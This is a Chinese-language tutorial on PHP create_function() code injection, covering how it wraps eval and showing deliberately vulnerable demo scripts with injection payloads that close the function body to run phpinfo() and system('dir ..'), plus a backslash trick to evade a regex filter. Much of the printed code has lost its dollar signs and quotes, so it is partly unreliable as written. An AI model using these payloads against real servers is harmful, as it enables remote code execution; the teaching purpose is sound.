create_function()函数
官方文档介绍
示例代码:
代码语言:javascript复制<?php
newfunc = create_function('a,b', 'return "ln(a) ln(b) =". log(a * b);');
echo "New anonymous function:newfuncn";
echo $newfunc(2, M_E) . "n";
// outputs
// New anonymous function: lambda_1
// ln(2) ln(2.718281828459) = 1.6931471805599
//注:lambda_1函数名随着执行次数增加会逐个增大
?>分析
create_function()会创建一个匿名函数(lambda样式)。此处创建了一个叫lambda_1的函数,在第一个echo中显示出名字,并在第二个echo语句中执行了此函数。
create_function()函数会在内部执行 eval(),我们发现是执行了后面的return语句,属于create_function()中的第二个参数string $code位置。 相当于重写了一段代码:
代码语言:javascript复制<?php
function lambda_1(a,b){
return "ln(a) ln(b) = " . log(a *b);
}
?>usort()函数
官方文档: demo1.php:
代码语言:javascript复制<?php
error_reporting(0);
sort_by =_GET['sort_by'];
sorter = 'strnatcasecmp';databases=array('1234','4321');
sort_function ='return 1 *'.sorter . '(a["' .sort_by . '"], b["' .sort_by . '"]);';
usort(databases, create_function('a, b',sort_function));
?>payload:?sort_by='"]);}phpinfo();/* 匿名函数实际的执行:
代码语言:javascript复制function niming(a,b){
return 1 * ' . sorter . '(a["' . $sort_by '"]);}phpinfo();/*
}继续分析一个例子:
demo2.php:
代码语言:javascript复制<?php
show_source(__FILE__);
act=_REQUEST['act'];
arg=_REQUEST['arg'];
if(preg_match('/^[a-z0-9_]*/isD',act)){
echo 'hacker';
}
else{
act(arg,'');
}
echo '666';
?>代码分析:preg_match过滤要求$act参数不能只有数字字母和下划线 绕过过滤后动态执行函数,但已经设置了一个参数为空字符”
解决思路:
利用create_function()函数重写函数的特性闭合参数的括号,并用/*注释掉后面的代码 使用反斜杠绕过preg_match()的检测(在函数名前加反斜杠不影响函数执行)
payload: ?act=create_function&arg=){};system(‘dir ..’);phpinfo();/* 相当于源码变成了:
代码语言:javascript复制<?php
show_source(__FILE__);
act=_REQUEST['act'];
arg=_REQUEST['arg'];
if(preg_match('/^[a-z0-9_]*/isD',act)){
echo 'hacker';
}
else{
create_function(){};system('dir ..');phpinfo();/*
}
echo '666';
?>成功执行代码:
<?php
lambda=create_function('a,b','echo "###a--b###"."n";');array=array("a","b","c","d");
echo usort(array,lambda);
?>参考资料:https://www.cnblogs.com/zzjdbk/p/12980483.html
